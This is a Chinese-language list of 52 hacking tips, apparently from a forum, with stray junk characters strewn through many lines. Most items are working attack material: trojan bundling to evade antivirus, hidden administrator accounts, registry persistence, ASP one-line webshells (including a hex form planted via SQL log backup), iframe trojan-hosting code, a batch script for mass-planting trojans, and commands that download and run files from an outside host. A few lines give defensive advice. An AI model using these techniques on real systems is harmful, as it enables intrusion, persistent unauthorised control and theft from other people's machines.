1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,; O4 r& e5 e! B; y
cacls C:\windows\system32 /G hqw20:R
% H1 q$ x- P* `* p9 g$ S思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
) A" N. O; y V: z; x% l ]恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F, s7 B1 P7 N6 {( S1 ^
* `" F; t# l# i! Q8 Q1 P2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
2 @+ c0 [% S- {0 Y s
; d1 b/ G, c/ j. M. p- _3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。3 R9 T# ~. x5 b' k7 `% U- a
1 f& U8 [, ]4 X# y
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
3 ~( ?; |4 j( A% l9 z
$ @3 H F( B9 g# p; g0 P% M6 k* Y5、利用INF文件来修改注册表* G. O* |7 W* |9 T. _# h- ?' W/ f# Q( B: K
[Version]7 M. Z! `& i& v1 s0 g
Signature="$CHICAGO$"7 Y* C& o! d( T; ~
[Defaultinstall]
# \, e- a2 i, u0 u' x+ _% D& H$ ZaddREG=Ating+ |" {- m( S8 r, \
[Ating]
. g0 f8 o9 b" [+ A9 b/ |* t- GHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) t$ r( A' j: M3 o) c' n9 L* D以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
1 X7 n& t1 e% O9 r( [6 w- j0 ^, drundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
% p1 |: T' X' {6 j其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
. k9 O6 F! ]2 QHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
+ k3 q# x3 @7 {% H% c& h1 A4 eHKEY_CURRENT_CONFIG 简写为 HKCC% N( {0 m/ W X# M
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
/ z6 T: B0 R9 W/ B' F"1"这里代表是写入或删除注册表键值中的具体数据
( D4 ]( q2 n" |3 l
1 o; J' r$ f& a! c7 w6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画," s7 t3 l2 r8 [: N! y8 j
多了一步就是在防火墙里添加个端口,然后导出其键值3 A4 e0 o& |& n
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]% S2 P, x9 W! p; S/ y, z5 }+ \
( Z# L, s. C: i) }
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ S! B$ |' ^" O7 J! `$ K' d/ r0 A
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。' a+ W- w) X) }* ^" g# O% l
- }8 u# L: T v" y- H7 z8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
^9 e% F. X7 R, r0 `1 m( F. g
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,0 F P* s* I8 W- \9 S' Z
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。) @# Q! C' Y% P" B5 v+ X
& h' F u G( ~: q+ R* F/ C9 P
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”* U6 V* A1 r- r- d) {% K: E
# n U3 N! K+ Y- Y1 Q- S" Y; K
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
+ @9 D' e# i$ V5 i用法:xsniff –pass –hide –log pass.txt* e$ Y$ f5 B* \& U
. r- z2 ]8 L N0 [12、google搜索的艺术
. C4 Q5 n3 V, _! V4 S+ I+ S搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
S V) }, g) x或“字符串的语法错误”可以找到很多sql注入漏洞。
; r+ {. u( T5 y. ]4 F3 S5 C* F* H( L! q0 X( t# C* L) z4 R
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
; S- W/ W( @; [) e& V# C6 o& A" ~
% h* u4 {. G; j$ J# H14、cmd中输入 nc –vv –l –p 1987
7 K! _; H4 C S做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
% w; O4 E* S _/ T2 b, i+ I5 ~( N+ }" Z( t1 Q0 f1 [
15、制作T++木马,先写个ating.hta文件,内容为. E: E; j) w: ]9 w
<script language="VBScript">2 R) t. H' _& M* U( Y+ l; d
set wshshell=createobject ("wscript.shell" )
. o8 H! ?+ D9 P8 S- Oa=wshshell.run("你马的名称",1)
+ F% a1 [* ~, ]: uwindow.close
5 f9 L7 Z+ x/ c- V9 C4 _</script>
" G) F5 i) u( U4 p% W再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: ^9 E k& a. Q0 j% b( }5 k% x
" G. G; V5 {7 j' s4 i/ k4 W16、搜索栏里输入 [! L. D6 z$ R: J0 Z" R
关键字%'and 1=1 and '%'='
/ k2 }: m. `( A, T7 \: l3 f9 d关键字%'and 1=2 and '%'='
5 Z! p: Z- \7 O比较不同处 可以作为注入的特征字符. L3 x, y$ m* { U8 a8 P( w; g
" r+ [9 l& P" u17、挂马代码<html>
6 k; n R2 Y) N<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
+ H$ O3 C& Q2 \8 ~</html>& i& c/ R! z5 s* ]6 i
$ u3 ^! A8 h% E' S, g
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
: `; d V: W e# H0 M: ~net localgroup administrators还是可以看出Guest是管理员来。
* U2 S5 ^5 x* Y4 [2 A
( ^5 z& {8 P5 E) `+ Q2 M/ s19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等# O ?7 k2 {+ h
用法: 安装: instsrv.exe 服务名称 路径$ T3 p' h! ]% A A/ {, G J, r
卸载: instsrv.exe 服务名称 REMOVE0 k- U2 _$ T- A+ Z
9 H3 p+ L7 P8 y2 a* b2 S4 C
- u4 {5 [: p. k" ?3 A& g: s( T$ H! ^21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 o+ y3 k; S* ]' {不能注入时要第一时间想到%5c暴库。) _! q p/ m6 ?0 E
" p8 m( z) T$ J1 z7 n
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
# F- _7 [5 w7 N8 {
. w: k/ x% |0 S, x/ t; k* y23、缺少xp_cmdshell时
) p. r# P( f- K; l尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
0 R; k) ^7 P7 z; w假如恢复不成功,可以尝试直接加用户(针对开3389的)
' H1 b& z: B$ G1 zdeclare @o int
l( v6 ^7 R6 y! x0 I" f- m5 zexec sp_oacreate 'wscript.shell',@o out( y% d' J6 k9 H6 j7 x
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员4 X% O, S8 S# v8 s
; d5 `9 p/ r1 S24.批量种植木马.bat
! \$ |$ L7 R$ a4 n& m* y9 gfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
+ F4 v4 D( `: G8 b* }for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间8 I' s: S+ P& ^' q9 c
扫描地址.txt里每个主机名一行 用\\开头
' k7 ~3 S' N) {3 f& F
. Y- S8 K$ Y% Q" g; C# m: ]25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
' ?: y5 O6 F( N- C1 ?" H8 r7 ~; M; h' S; a% E; @' Y
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
# s+ p6 T$ ^8 N7 t: ?- F将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.: P9 M1 p9 Y$ `
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马8 X/ K7 [9 M- t' `: I' M- d
7 A6 ~" V3 V. m4 o" l27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP. }5 f& i$ E$ k5 {6 i" m
然后用#clear logg和#clear line vty *删除日志
Q5 ]4 U# J2 s! s
6 U' ?6 p- N# L1 J28、电脑坏了省去重新安装系统的方法
0 A5 O7 N2 e7 C纯dos下执行,! I% v: {& I- k3 u6 d4 ?- J
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config% f4 i$ n" s: H* b, E [) Y2 x
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config. _% u% U) z% Q, |" O
4 S& R0 A7 x* M0 y
29、解决TCP/IP筛选 在注册表里有三处,分别是:
& O1 j) |6 s/ `+ X" sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
; ~& d# B9 T9 g6 I$ }0 `) uHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ e" W- ?/ R- c9 U4 w' \& }6 KHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, p' F; f4 C) s% {$ d
分别用! }# x' d# m3 u4 X4 M
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 A8 w: ~5 v3 w2 M$ U# S* D
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 a, D0 N8 w/ c+ s% ^2 L7 S' ~; m
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 w: E6 W2 V5 v: i' H
命令来导出注册表项
\- x- t9 D* S. D: ^然后把三个文件里的EnableSecurityFilters"=dword:00000001,
$ E0 }/ K* T4 l; [改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
9 Q6 y& q1 l, m+ gregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
3 B& U3 c1 O" G
9 m2 P: q5 u) h: F- s/ m& _6 @$ P30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U( x6 y$ Z8 A$ W( z. {
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3& v/ s1 h" G: j1 |5 t) h. j/ {
) F( x: ]. t3 |2 i7 B- e9 M& B
31、全手工打造开3389工具. ~3 |/ k, e# \2 ~
打开记事本,编辑内容如下:
8 r$ }8 L5 r3 P. T# H5 b# {5 q3 Secho [Components] > c:\sql% ?. q7 K i, o5 n" Z& o
echo TSEnable = on >> c:\sql
4 M9 [0 {5 W/ p; W5 K( \, }sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q, r3 g1 n6 ] y% j& A
编辑好后存为BAT文件,上传至肉鸡,执行- W, H6 M) H* q( z2 O+ F
, G/ w3 |6 [ e
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马) I3 E+ g- s* v* w1 H3 I( G, P
+ ~3 X7 {9 F$ `% ~+ q
33、让服务器重启
8 N: h! y b7 ]写个bat死循环:) b' ?) F* @0 k7 e
@echo off
( f- m4 I3 \0 ^5 }:loop16 y+ H; n/ y7 [& [' [/ F9 }
cls
4 [, N7 b/ S8 j! B- r/ o$ Estart cmd.exe$ y4 n. K! |! x, |1 Q/ E: ?% i
goto loop16 T5 l2 k7 c, P0 D$ i" D
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启# I4 K5 ]7 g1 Y5 q" j- w
! H/ j% M; H# a9 N7 n6 W34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,1 ?$ z# P1 u, M ^/ [
@echo off
1 F# Z' T% d) d1 n6 Bdate /t >c:/3389.txt# V* D, P; l( Y6 M# _
time /t >>c:/3389.txt Y9 ?* T0 d: P
attrib +s +h c:/3389.bat- ?2 |! W/ Q7 k( r6 J) s/ }/ z
attrib +s +h c:/3389.txt2 O9 `5 T5 l! i* s! J- g7 @/ ~; t
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt; E. \5 g: P* _, i- r5 }. o
并保存为3389.bat6 P7 L9 D1 B/ I5 u9 b9 e# D! Y
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
+ x7 B: C& K. W5 a7 [4 N5 _1 U" T+ B' [
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
' M7 |/ I8 V7 m7 s+ D0 X2 M5 Istart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
1 W+ t3 i- G+ n# i9 c输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。& _: b1 B' x' |$ v5 ~8 S
3 V5 O: ?8 y1 }0 Z3 @ R
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件0 m2 T2 j% U$ v
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 r. Y3 N2 x2 d- [* e+ y' Jecho 你的FTP账号 >>c:\1.bat //输入账号4 ?6 r# w4 |6 h. k
echo 你的FTP密码 >>c:\1.bat //输入密码# j$ `$ z) h3 `7 ]8 I
echo bin >>c:\1.bat //登入
, J* d, r% ?: V$ n/ oecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
! e3 L" }& V o! r, }$ F1 c, `echo bye >>c:\1.bat //退出
) y* \) R+ x- |; U' }) u然后执行ftp -s:c:\1.bat即可
3 g5 F( m' y) k: x7 ~3 z
! j7 _& ~( O! ^! M37、修改注册表开3389两法
! m9 P7 I5 h8 M# Z$ U1 b. @(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
5 G" ?, ?9 A2 K ~( O3 A4 Zecho Windows Registry Editor Version 5.00 >>3389.reg' }8 Z+ x; n, \8 s
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
; N2 P, j* p' J9 S; hecho "Enabled"="0" >>3389.reg
! R2 n2 k* \0 Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
$ {4 W, w6 L/ h1 w; xNT\CurrentVersion\Winlogon] >>3389.reg$ h: e' a) t( L( Q5 Q$ j) u
echo "ShutdownWithoutLogon"="0" >>3389.reg" m/ d4 T7 P3 F8 |0 `4 v! ]: a8 z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]# h+ k6 o: l& i7 a4 L
>>3389.reg) {6 H8 }& X6 I$ w3 t- e
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
* C8 {6 e3 v n) B0 g1 recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 Z' @: m3 O# w8 H
>>3389.reg; l( s9 k0 a5 K# ^
echo "TSEnabled"=dword:00000001 >>3389.reg
) E% i; `$ y6 q0 J1 ?/ V% Q6 Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg A+ l0 I/ }1 W, j
echo "Start"=dword:00000002 >>3389.reg
5 c, k7 g$ }" x: i( K: g3 e$ I0 @$ Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
3 _2 D; V; R0 a: j+ L5 v>>3389.reg2 v! f8 T! h1 M, [9 X" _" O
echo "Start"=dword:00000002 >>3389.reg
1 l1 [6 l) ?0 @ Qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg- u! a4 `9 u- }4 I
echo "Hotkey"="1" >>3389.reg6 a; l! \; Q1 G! i2 |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; k4 c+ W! q: x/ V! V7 {
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
7 p, q6 l% L& i$ ~/ k$ vecho "PortNumber"=dword:00000D3D >>3389.reg, r! d6 O/ Y0 h3 F- {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 c- }6 g; w; A; `9 |2 V4 y
Server\WinStations\RDP-Tcp] >>3389.reg& ^/ i Q- J; b7 Y; i
echo "PortNumber"=dword:00000D3D >>3389.reg
0 @+ d* K( l: p: i! i7 I把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。( T2 V( M/ _6 ~, b, R
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)! M D% u; u' G7 ^- J h) A
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
' ?6 g4 o5 _4 z4 `/ Y(2)winxp和win2003终端开启
. J8 x, @5 J3 G' w+ v0 |, I( H5 P: P6 X用以下ECHO代码写一个REG文件:" j. [, i+ r5 H
echo Windows Registry Editor Version 5.00>>3389.reg
% r* @, X) p6 H9 ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* ~3 E* e% Q1 J
Server]>>3389.reg
$ _1 \) r3 ~) {3 m1 `echo "fDenyTSConnections"=dword:00000000>>3389.reg
/ S% u+ U6 U+ ^( l+ h1 Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# B4 c/ D; R' Q L/ W) G2 [* `! z& qServer\Wds\rdpwd\Tds\tcp]>>3389.reg" ~: O, L: V/ d: n! l. W
echo "PortNumber"=dword:00000d3d>>3389.reg5 V6 K0 i, T. w' h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) R- {6 g" a$ ?6 o
Server\WinStations\RDP-Tcp]>>3389.reg
& o" c) m' s" t. G; y1 uecho "PortNumber"=dword:00000d3d>>3389.reg
" s0 G3 ]8 \6 E! U3 N6 U然后regedit /s 3389.reg del 3389.reg, ], {6 z, z( s$ V2 g9 @
XP下不论开终端还是改终端端口都不需重启) I$ x& g/ X! |7 N9 V3 J* G
+ m4 j8 V2 v) Y38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃 Y' Q( z( ]# a
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
0 }4 e9 t7 T5 O+ w8 I. R: q! f: M% H6 q/ j5 V; J
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!% E9 { x( ]( s7 f
(1)数据库文件名应复杂并要有特殊字符
, ]2 Y6 U4 p& Q6 l" q" x(2)不要把数据库名称写在conn.asp里,要用ODBC数据源+ o+ a& n7 I& T) X* L7 n1 F
将conn.asp文档中的
?: V, @6 r$ t3 v# DDBPath = Server.MapPath("数据库.mdb")
) X7 c$ J4 {. \8 cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
: ?3 f# u' d8 @, S* [1 V; g, H* F" z, r8 m
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
( Y6 V. N. |1 |) d) @, ^/ ]! b(3)不放在WEB目录里! n1 W5 D0 M2 y! @1 o8 D
9 E. ~ |, v: j {+ `/ t* E3 q7 H40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉9 z9 H4 w+ H S( W+ W' X; Y9 }" W. z
可以写两个bat文件
. r, f- q1 T. \3 |8 D6 {@echo off* R+ I7 \( {' \. R+ t! H
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! w) v- \, G: r3 p* U% F4 |8 i% u@del c:\winnt\system32\query.exe# i' O' D; m! G8 _0 S
@del %SYSTEMROOT%\system32\dllcache\query.exe
5 ^7 R" U' u# v4 `2 B9 n@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的2 o7 ?! Y3 ?1 c7 |8 ?' Z: C. j
) ]2 X/ Z+ A" o- h
@echo off7 G0 R" J* Y: q P- |
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
0 S% k1 J% m3 U! i- x@del c:\winnt\system32\tsadmin.exe
, x' z/ ^, j9 E+ d7 d1 g0 f@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex6 K# i; B, y+ C4 \$ s3 H8 C! c
! B6 y4 G4 G4 k( \; {41、映射对方盘符
( _4 [; G, f9 Y* t$ i+ @; \telnet到他的机器上,2 O& c- y3 q* {7 ~7 ^" ?# \* y/ c
net share 查看有没有默认共享 如果没有,那么就接着运行
$ E* r* W. a8 `# U& l& S) _* t5 Cnet share c$=c:
5 j+ `* h2 |( R; r0 Jnet share现在有c$
+ [- Q4 w" s& { N. q在自己的机器上运行
& t6 J0 Q8 M2 f( m7 F' H2 I" cnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
* W$ G1 K3 }: Z0 V+ @. a
" ~0 a! {" e( `8 K4 m, R! c42、一些很有用的老知识9 b$ {' H x- h8 i$ T F, H
type c:\boot.ini ( 查看系统版本 )
: Y1 F; D% X. k! T. T+ enet start (查看已经启动的服务)
, W- @- B* ]1 N7 l' W y& Equery user ( 查看当前终端连接 )
" H! T+ b* Y+ n: pnet user ( 查看当前用户 ); }8 B1 B& P! c% ]5 O8 E `: ]
net user 用户 密码/add ( 建立账号 )8 u( B; l9 z. d$ [
net localgroup administrators 用户 /add (提升某用户为管理员)/ `6 c* l! {" `+ K
ipconfig -all ( 查看IP什么的 )/ R) c& a8 E* }9 N8 k8 o* B. V0 Z
netstat -an ( 查看当前网络状态 )
r" D |/ K s3 [. ^* Q7 B" d& _findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
9 N* v, s' Q1 @. U/ `& B3 _克隆时Administrator对应1F4" @' e! f, M: j/ V: Q
guest对应1F5, T& {) Q( x, q/ i
tsinternetuser对应3E8
" l& o1 }+ x; Q7 m7 x
; s2 b* G5 {6 D& ]. F; b' h6 l; |43、如果对方没开3389,但是装了Remote Administrator Service
7 h& L6 x* F& a用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% \ r. C# H9 e
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
" F' [ h3 J7 F& `$ y# p先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin": C: r% U& d; [$ @3 n! b. G
! } z+ {; N) x0 q/ f# y! S# D2 [! o
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)! @5 I; T; M6 ^, B. K. X% s/ A n
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ |9 l- I$ q& P6 ]
$ A6 a X' [5 C- {& h45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
2 C# Y o, G, B& K1 Q3 }* Wecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
6 v+ l, m9 I1 N^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =; N4 R, q$ a0 } J; |3 p8 ^: a: W
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =; C3 P' t9 }7 S( v: o, J% ?0 }
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ ]7 S) B6 {/ X# ^# S- v0 a(这是完整的一句话,其中没有换行符)
: M' Z0 k; s: O# M然后下载:8 B% w" G# `7 V2 S
cscript down.vbs http://www.hack520.org/hack.exe hack.exe: t+ f+ s- F( M' \& V, f
1 C. L% a9 h3 n9 G" i( S46、一句话木马成功依赖于两个条件:$ a% ^7 d* f- r1 Z5 @# M
1、服务端没有禁止adodb.Stream或FSO组件' Q' t: D% Y6 c5 D
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
, J) o# @% x. z: q
; J8 Z$ A! g2 O+ l47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" a; _. E+ e X B# w;alter database utsz set RECOVERY FULL--( G3 f9 e1 @$ {& {6 C) _. M
;create table cmd (a image)--
7 K5 N$ C& C/ ^2 d9 k! B2 k;backup log utsz to disk = 'D:\cmd' with init--$ }) D! F; O) w' Q# u
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--3 m" c% [5 m, l9 [
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--# g2 P" |$ E# i6 P; B9 H) u
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
0 F9 x+ C3 |( l+ h
/ S; v0 w! m4 }* U; i f& J' C48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:# b1 n! P) c" [
+ W8 z# l/ F: K8 l9 A6 ?
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
2 I# c; {+ [! b8 ?所有会话用 'all'。' T+ e2 w2 z, h" o
-s sessionid 列出会话的信息。5 |4 l* v5 o8 g
-k sessionid 终止会话。. l. @5 Z: J1 l. b* C, y y; ~
-m sessionid 发送消息到会话。: Y# @" m: R- b9 {, ?! L
5 V) H6 k" a# X/ H6 E0 p" P
config 配置 telnet 服务器参数。
" I/ a2 M0 \6 o( B! G6 W; S2 i* {% _: x0 y. h6 c( l8 y8 i
common_options 为:
2 e0 |8 q$ l; o* O1 m$ U-u user 指定要使用其凭据的用户# E* ]9 m1 f3 W4 D" N. I* y- ^0 Z$ d
-p password 用户密码3 \2 M( x$ }. i3 x/ J' G# _. ~
1 l) N* `& ?+ J( h$ O! \8 jconfig_options 为:
, N# i9 o$ S/ Cdom = domain 设定用户的默认域
7 W2 L% R" [+ gctrlakeymap = yes|no 设定 ALT 键的映射* G; _/ J! \% L
timeout = hh:mm:ss 设定空闲会话超时值9 o- h3 b% P6 e+ N6 q
timeoutactive = yes|no 启用空闲会话。
7 Z& i8 s* t3 w* y9 P( Nmaxfail = attempts 设定断开前失败的登录企图数。
% t. Q7 N; |7 W# [! Pmaxconn = connections 设定最大连接数。" K; ~( k$ b: Y" U/ y- Q) |
port = number 设定 telnet 端口。
" _ ] b4 [- p! A7 D7 dsec = [+/-]NTLM [+/-]passwd2 i. t) q. E4 I, X5 G( N$ B
设定身份验证机构8 A( {4 |8 i; H' `9 ?! y# C
fname = file 指定审计文件名。
- R/ Y* J. K/ l, wfsize = size 指定审计文件的最大尺寸(MB)。% N. T3 t4 F* \: E
mode = console|stream 指定操作模式。1 y* E/ z" f* b+ n& {
auditlocation = eventlog|file|both
+ L* o2 d% H# _/ `. ], t指定记录地点
" a {* V- u- \+ i! g0 Oaudit = [+/-]user [+/-]fail [+/-]admin
, U, b I. ?: l/ P
. N" [5 f1 T; U6 q4 P+ T x49、例如:在IE上访问:
# O; n9 c3 W6 H( T5 ?6 Jwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
$ [2 C! R/ Q( O0 E0 H. bhack.txt里面的代码是:
- t+ G7 P$ w a% F& k% ]<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"> n; y7 |: B6 Y, g
把这个hack.txt发到你空间就可以了!, W. M" ~8 ]0 E9 c
这个可以利用来做网马哦!
5 W5 f7 B7 A5 W
1 k! W. \+ w2 r+ c1 c% w m( O50、autorun的病毒可以通过手动限制!
k( [2 K9 A! D! o: q4 x6 m1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!! l% j a( F; p: E' @( M
2,打开盘符用右键打开!切忌双击盘符~
9 j) t- w6 i. K% T& ?6 F7 u/ s3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
; p7 N/ i! w" q( \9 ~" J3 O4 \9 @: T
# G6 ^% f( J# }% q51、log备份时的一句话木马:
2 B7 g4 b1 \: s5 j9 ?7 p5 w) ba).<%%25Execute(request("go"))%%25>
. a$ J8 U6 R) N7 c0 f3 L6 `6 eb).<%Execute(request("go"))%>
4 U2 Y# {1 [% w8 Y: ?# |: S9 Yc).%><%execute request("go")%><%, z9 Z1 P) T$ d4 _4 o
d).<script language=VBScript runat=server>execute request("sb")</Script>: v# J& g7 a5 q6 k. I4 b! _5 D
e).<%25Execute(request("l"))%25>0 `+ K D r+ I, `2 [3 Z
f).<%if request("cmd")<>"" then execute request("pass")%>
2 s: s- q$ [7 |: G& l/ w# s* B9 z( T8 U) J
52、at "12:17" /interactive cmd) ?, c0 G1 D% l1 F' R
执行后可以用AT命令查看新加的任务
